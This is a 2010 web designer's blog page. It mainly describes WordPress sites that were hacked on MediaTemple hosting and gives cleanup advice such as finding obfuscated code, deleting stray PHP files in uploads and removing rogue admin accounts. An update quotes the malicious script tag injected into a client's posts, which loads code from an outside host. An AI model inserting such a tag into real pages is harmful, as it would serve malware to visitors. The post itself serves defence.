You're viewing posts in how-tos & web design (ing)
Recent WordPress Hacks on MediaTemple
written 28 Jul 2010 in the earliest morning
I am involved in dozens of websites, some of my own doing and others that I have created for clients at one point or another, almost every single one of which uses WordPress as a CMS. Though I mention the importance of keeping WordPress up to date, many of my clients just don’t bother, either because they’re pre WP 2.7 and it would involve a good deal of FTPing, which they are sometimes incapable of, sometimes don’t want to pay me to do it, and most often simply just don’t realize how important it is. I’ve seen a rash of hacks to WordPress sites in the past week, and not only to out of date WP installations, but even to this site, which is running the latest version of WordPress and on a (supposedly very secure) MediaTemple server.
I thought I’d share a little information I’ve gathered on this subject, in case it might be helpful to anyone else out there.
Hardening WordPress Security
I won’t bother reprinting the entire article, because well that would be plagiarism, but there’s a bunch of useful information posted at Smashing Magazine on how to harden your WP installation. Read it here.
I particularly recommend steps 1 (particularly if you don’t have any use for additional registered users other than admins, though if you do have other users, you might want to give this a skip), 3,4,5,7,8 and 9 in particular.
How to Find Compromised Files
I’ve noticed three main ways these hackers have changed my files, primarily by altering existing files but also by creating new files.
- Check your header.php and footer.php (the latter was a culprit more often than the former for me) for a bunch of extra code. This will be unreadable, random letters and numbers, which is something called obfuscated code that basically makes it harder to find by antivirus software. Once you find it, delete the heck out of it.
- Check any Javascript files, typically in your theme folder but possibly in your plugins folder or anywhere else on your site, for similar code, and remove it as well.
- A bit more tedious, go into your /wp-content/uploads folder and look for PHP files that are just named with numbers, such as 12345.php. Delete these. Really, there probably shouldn’t be any PHP files in your uploads folder, other than perhaps an index.php file.
I’ll update this post as I come across any further information on the subject.
Update 7/29/2010 1:11am. On a very outdated client’s site (WP 2.3.3) I found the following code injected directly into posts: <script src=”http://ae.awaue.com/7″></script>. The client’s site also had a database error, which was odd that the injected malicious code would also break the database, preventing the site from being accessible and therefore the malicious code from working…
Update 7/29/2010 2:10am. It’s also a good idea to check your Users list for admins, particularly jonnya, jonnyb and amin. Delete ‘em.
Popularity: 1% [?]
More Posts in how-tos & web design (ing)
How to Add Javascript Applets to as Google Chrome Bookmarks
Javascript applets are little pieces of javascript that can do everything from modify a website you’re on in a variety of ways to reorganizing the light spectrum of our universe to hex values, except that it probably can’t do that last bit. For all ya’ll website designers out there, and I’m talking to you Aunt Polly with your iWeb open trying to start up mycatgotstuckinavase.com/howcute, there’s a great service out there called Cross Browser Testing. I’ve already linked to it like a million times divided by 500,000, so I won’t again, except for right here, which lets you test websites in other browsers that you might not have, say, because you bought an MacBook to match your stainless steel fridge but you want to test in Internet Explorer and it’s only available on ugly computers. They offer one of these little Javascript applets that gives you one click access to their service so you can fire up your VNC client and be logged into a Windows machine somewhere in Tennessee faster than the Civil War is over (take down the flag, boys, you’re part of the Union now). Adding these applets to Google Chrome isn’t as drag-and-drop easy as it is in Firefox, though. Google decided that a Bookmark Toolbar would work best on a New Tab page, somewhat defeating the point of having a toolbar to prevent you from having to do unnecessary work. So for those who’d like to add an applet to their bookmarks in Chrome, here’s the how to.
Read more on How to Add Javascript Applets to as Google Chrome Bookmarks…
Popularity: 1% [?]
Google Chrome Solutions: Bookmarks Dropdown Icon
For anyone who likes the idea of a bookmark’s toolbar and isn’t satisfied with the idea of it only appearing in the New Tab window of Google Chrome, but also doesn’t necessarily want a huge bar spanning the width of the browser (like in most other browsers, where your bookmarks are all listed below the address bar), there’s a great little dropdown solution via an extension called Bookmark Tree.
Read more on Google Chrome Solutions: Bookmarks Dropdown Icon…
Popularity: 1% [?]
Google Chrome Solutions: How to Get Native Gmail Support in Google Chrome
How to Get Native Gmail Support in Google Chrome
Next in my list of irks was that Chrome didn’t support web-based email clients like Gmail, instead defaulting to opening whatever your operating system’s default mail client might be (Outlook, Mail, etc.) Via extensions, we have a few solutions to this problem:
Read more on Google Chrome Solutions: How to Get Native Gmail Support in Google Chrome…
Popularity: 1% [?]
Google Chrome Solutions: How to Get Nice Looking RSS Feeds in Google Chrome
Now that I’ve moaned and complained about everything that’s wrong with Google Chrome, I figured I should provide a few solutions to the problems I’ve mentioned previously. Chrome isn’t a bad browser, it’s fast, has a great Error Consol, and thanks to extensions, most of the issues I’ve mentioned can easily be overcome. First we’ll cover:
Read more on Google Chrome Solutions: How to Get Nice Looking RSS Feeds in Google Chrome…
Popularity: 1% [?]
Using Google Chrome, a Web Designer’s Experience, Part 5: The Little Things
I’ve discussed issues I’ve noticed with Google Chrome that are specifically related to using it for building web sites. There are a few other minor annoyances about Google Chrome that add up to big hassles when you combine the time they waste throughout the day, and these are likely to affect any user, not just those of us with our digital hard hats donned.
Read more on Using Google Chrome, a Web Designer’s Experience, Part 5: The Little Things…
Popularity: 1% [?]
Using Google Chrome, a Web Designer’s Experience, Part 4: Bookmark’s Toolbar
Browser testing is essential, and I use a wonderful online browser testing solution from Cross Browser Testing. It has this great feature where you can add a Javascript booklet to your toolbar, visit the page you want to test, click the booklet and it’ll open up a VPN connection to the machine / browser combination of your choice. The process is so incredibly simple that it makes browser testing as easy as Tony Hawk’s video game empire made skateboarding for posers.
Read more on Using Google Chrome, a Web Designer’s Experience, Part 4: Bookmark’s Toolbar…
Popularity: 1% [?]
Using Google Chrome, a Web Designer’s Experience, Part 3: Webkit Annoyances
It’s already annoying enough that Mac browsers render fonts all nice and perfectly smooth while Window’s machines still refuse to automatically implement anti-aliasing on fonts. Aside from making fonts (and the @font-face CSS selector that’s now a reality) look bad on every browser available to Windowleans, it comes with the side effect that Mac browsers will often render type that takes up fewer pixels on the screen itself. This can be an issue when the length of your text matters. For example, say you have a background image for your navigation bar. You want to have part of the navigation bar’s background blue while the rest of the bar is red, but you don’t want to use any image replacement technique for rendering the text itself (you might have a dynamic menu bar running off of your CMS so that when the pages on your site are updated, the navigation bar is as well). If your text renders at different sizes on different Operating Systems, you need to provide different CSS to each OS. Annoying, but doable.
Read more on Using Google Chrome, a Web Designer’s Experience, Part 3: Webkit Annoyances…
Popularity: 1% [?]
Using Google Chrome, a Web Designer’s Experience, Part 2: Inspect Element
Firebug is like a baby made of candy. If you don’t get that analogy, no one will blame you but best not to bring it up around the hitching post, water cooler or back of the garbage truck, wherever you take your particular daily break. Suffice to say, this little plugin developed for Firefox is like having a twin brother who will go to school for you, do all of your homework, sit in the waiting room until the doctor is ready to see you and let you take his girlfriend home after he did all of the wining and dining.
Read more on Using Google Chrome, a Web Designer’s Experience, Part 2: Inspect Element…
Popularity: 1% [?]
Using Google Chrome, a Web Designer’s Experience, Part 1: The History of My Web Browser
I jumped on the Firefox train as quickly as any other up and coming computer nerd Web Designer hopeful way back in the turn of November, 2004. How wonderful were those days? Blogging was cool, Google didn’t have a sidebar and when I went to the bar with my friends, no one sat on their phone showing me how great the latest app that tracked everything you do everywhere you go was the whole time.
Popularity: 1% [?]
